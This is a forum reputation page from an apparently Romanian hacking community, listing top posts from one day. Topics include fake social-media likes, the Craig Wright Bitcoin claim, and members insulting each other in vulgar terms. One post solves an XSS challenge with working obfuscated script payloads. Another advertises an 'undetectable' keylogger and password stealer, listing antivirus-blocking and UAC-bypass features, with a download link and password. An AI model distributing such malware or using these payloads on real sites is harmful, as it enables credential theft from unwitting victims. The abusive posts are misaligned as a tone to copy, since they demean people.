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Showing content with the highest reputation on 05/02/16 in all areas

  1. Dupa pozele puse, mi-a fost usor sa-ti gasesc site-ul. In primul rand pagina de facebook nu merita nici 10$, ai 2086 like-uri si pe zi ce trece inca dispar, de la 2100, oare dece? aa, da, era sa uit, sunt like-uri false, facute cu addmefast, de acea dispar like-urile pe zi ce trece, altfel cum ai fi facut acele like-uri? pe pagina ai decat 2 posturi :))) Iar site-ul acela, tema e ok, dar e nulled, nu cum spui tu premium, iti pot da link pe pv, daca ai fi avut macar vizite pe site.. (gowatch..-etc) dar dupa numele domeniului tau, mai sunt inca 5-6 nume la fel, nu ai nimic unic, sansele sa-l promovezi sunt 20%.. dar fie, spor la vanzare
    4 points
  2. Update: Se pare că omul de fapt nu a semnat nimic. A făcut un replay attack. https://www.reddit.com/r/Bitcoin/comments/4hflr3/craig_wrights_signature_is_worthless/ Australian entrepreneur Craig Wright has publicly identified himself as Bitcoin creator Satoshi Nakamoto. His admission follows years of speculation about who came up with the original ideas underlying the digital cash system. Mr Wright has provided technical proof to back up his claim using coins known to be owned by Bitcoin's creator. Prominent members of the Bitcoin community and its core development team say they have confirmed his claims. But many others in the Bitcoin world are asking for more proof. Signed blocks Mr Wright has revealed his identity to three media organisations - the BBC, the Economist and GQ. At the meeting with the BBC, Mr Wright digitally signed messages using cryptographic keys created during the early days of Bitcoin's development. The keys are inextricably linked to blocks of bitcoins known to have been created or "mined" by Satoshi Nakamoto. Sursa: http://www.bbc.com/news/technology-36168863
    1 point
  3. ? https://www.reddit.com/r/btc/comments/4hfyyo/gavin_can_you_please_detail_all_parts_of_the/d2plygg https://rstforums.com/forum/topic/101687-craig-wright-revealed-as-bitcoin-creator-satoshi-nakamoto/ I don't have a stake in whether he is or isn't Satoshi. But I have seen zero evidence of an advanced fee fraud. This is what we know: Multiple credible people have vouched for the fact that Craig is Satoshi, and have not backed down from that assertion. Some have said that Satoshi was a group (including Kleiman) protected / fenced off by a larger group. None of these witnesses have contradicted that. Keep your eye on that, above, as the evidence. You can't point at the "lack of other evidence" as evidence. You can't point at CSW's failure to provide you a public proof as evidence. Other potential evidence items such as CSW's past or financial difficulties or copies of letters and emails and trust documents, and blackmail / hack stories, and CSW hiring a PR firm, or Ian Grigg participating with R3, or Gavin visiting the CIA, or any number of other factors that people are throwing out, will lend weight to one side of the analysis or the other, but I suggest setting them aside when you evaluate what's going on here. Most of that stuff is noise when you come right down to it. Play out the scenario of what is being told to you by the credible witnesses. Is the story of the witnesses feasible? That someone had the idea in 2005 (sounds about right, considering all the design that went into the project), found some like minded individuals including someone to code and someone to help with the math in the paper, decided to keep a low profile out of fear (people were being jailed and harassed for potential attacks to the monetary system and for cryprographic use and software). That seems totally feasible. Let's continue: Picture this small group - many who fear for their life or freedom - publishing this software and paper. I know from personal experience that there was reason to be afraid and to remain anonymous. In fact, when Gavin publicly got involved in the project, I thought he was nuts to have his real name attached to it. So still nothing far-fetched about the scenario. If you lived it, you can appreciate it. If you read with passion how Phil Zimmermann was harassed, or the eGold team was harassed, or Von NotHaus, or any number of people. Hell, if you showed up at a conference with the wrong namebadge (indicating you might be Mitnick) you were harassed. The environment was crazy (and I think it still is, to some degree). OK, so, with secrecy and privacy, the team releases the software. A totally believable scenario. Under the name of Satoshi Nakamoto. And this group of people - many of whom only loosely know each other, nurture it along for two years, guarding their privacy out of fear. As it becomes more popular (jeoparding their safety even more), there are internal debates as to when to cut it off. Hell, this is being used for Silk Road and other illegal items - the team could be implicated in money laundering, etc. So fear - yes. Absolutely. The desire for privacy, yup. And then the first bubble occurs, and these "guys" can see they have a multi-multi-million dollar baby. So what happens: different people have different opinions. Some need the money - house in foreclosure, kids in college, whatever. Others argue that the team can use the money to smooth out the bubbles (buy low, sell high). Still others say that they agreed not to touch the BTC for a decade, and any sale of bitcoins would be a public display of lack of belief in the system. Still very believable. So an agreement is set up, that all the major stakeholders can agree upon. And the bitcoins are protected through a splitkey arrangements, kept on multiple continents in an m of n Shamir Secret Sharing setup. And then one guy dies. We still haven't left the realm of possibility yet. The dynamics of a group in fear with a lot of wealth - just imagine how crazy that would be. Then Bitcoin starts to gain some level of legitimacy (2014-2015), and it becomes less scary to be part of the inventor team. CSW starts showing up in videos with a smirk and a wink. This definitely happened. Whether CSW was on the team, or perhaps the leader of the team, isn't being claimed here, but I am saying that we still haven't left the realm of "possible". Then CSW gets hacked, and blackmailed. Definitely possible. Hell, if he IS Satoshi, it wouldn't surprise me in the least that somebody tried to extort him. And that's his claim. So here we are. Multiple people saying it's him. A group dynamic that is totally believable. If you can cut through all the smoke and nonsense, there's a "possible" scenario just waiting to be told, and I think we'll hear much more on this - but it'll take months or years. For now, I remain open-minded. Especially with no evidence of an "advanced fee fraud" (unless you have some). https://www.reddit.com/r/btc/comments/4i92l0/ian_grigg_on_twitter_csw_is_thinking_5yr_possibly/d2w7zkt
    1 point
  4. Da, cer iertare ca nu am pus ceva advanced pentru Reckon cel expert in pentesting. Mii de scuze!
    1 point
  5. Pentru ca creezi confuzie,poti fi confundat usor cu un moderator.Cred ca vroiai sa faci SE si nu ti-o iesit,deci multa muie.
    1 point
  6. ,,,poti sa folosesti asta...Ultimate Mint Live V1.5...!!!
    1 point
  7. Felicitari tuturor celor care au rezolvat challenge-ul ! Danyweb09 - error=location=this.alt%2bthis.id; alt=javascript:al id=ert(1) mah_one - error=al\u0065rt(/T3st/) 0x39 - error=aler\u0074(2) La insistentele lui 0x39 aici este si solutia mea : error=constructor/**/.constructor("\141\154\145\162\164(1)")() Challenge closed !
    1 point
  8. Eu va spun ca nu o sa mai scapati de milogi astia spammeri daca nu inchideti postariile astea de milogii si sai banatii , adica ce plm tiai gasit aici sa ceri bitcoin pt tactu duteb plm la munca si intretinel tu sti cati mortii mati au cancer in tara asta?
    -1 points
  9. Nu am intrebat de ce am luat ban. Nu te mai baga in seama.
    -1 points
  10. E foarte nasol, chestii basice, l-am descarcat degeaba.
    -1 points
  11. Features [+] %100 Fully Undetectable (FUD) [+] .NET 2.0 [+] server~200kb [+] Auto Update [+] Save Options [+] SMTP [+] HTML Log [+] Keyboard Hook (All characters) [+] Clipboard Hook [+] On-screen Keyboard Hook [+] Screenshot [Assembly] [+] Assembly Changer [+] Assembly Cloner [+] Icon Changer [stealer] [+] Chrome [+] IExplorer [+] Firefox [+] Opera [+] FileZilla [+] IMVU [+] Pidgin [+] FlashFXP [+] SmartFTP [+] CoreFTP [+] FTPCom [+] NO-IP [+] Paltalk [+] DynDNS [+] Yahoo [+] MSN [+] Steam [+] JDownloader [File Binder] [+] Multi File Binder [+] All Extension [+] "Just one time" Option [installation] [+] Injection (RunPE) [+] Add Startup (hide from msconfig) (Bypass UAC) [+] Hide File [+] Persistance [+] Melt File [+] Delay Execution [+] Kill Process [Options] [+] Block Anti-Viruses [+] Protected Process (Bypass UAC) [+] Block Rightclick (Bypass UAC) [+] Kill Taskmanager [+] Kill CMD [+] Kill Regedit [+] Kill System Restore [+] Disable Taskmanager [+] Disable CMD [+] Disable Run [+] Disable Registry [+] Disable System Restore [+] Disable Control Panel [+] Disable MSConfig [+] Disable Folder Options [+] Downloader [+] File Pumper [+] Extension Spoofer [Fake Message] [+] Header [+] Message [+] Style [+] Button [Web Options] [+] Host Edit [+] Web Filter (Bypass UAC) [+] Add UAC Manifest Scan link: https://razorscanner.com/result.php?id=614853 Download link: https://mega.co.nz/#!cAxTECwa!UcIoexJgZFmSn544HswIRhtCQA_nFWpY9mMF5uBQ0ak Username: beta Password: beta Credits: agent_tesla
    -1 points
  12. Salut! Am gasit forumul acesta pe net cand cautam niste tutoriale si mi se pare o comunitate misto. Sper sa invat multe de aici. Probabil va intrebati de ce am nicknameul si avatarul asemanatoare cu ale unui alt user. Motivul este urmatorul: nu am imaginatie. Desigur, nu cred ca acest lucru este o problema. PS: Nu sunt Reckon PS2: Nu sunt sleed
    -2 points
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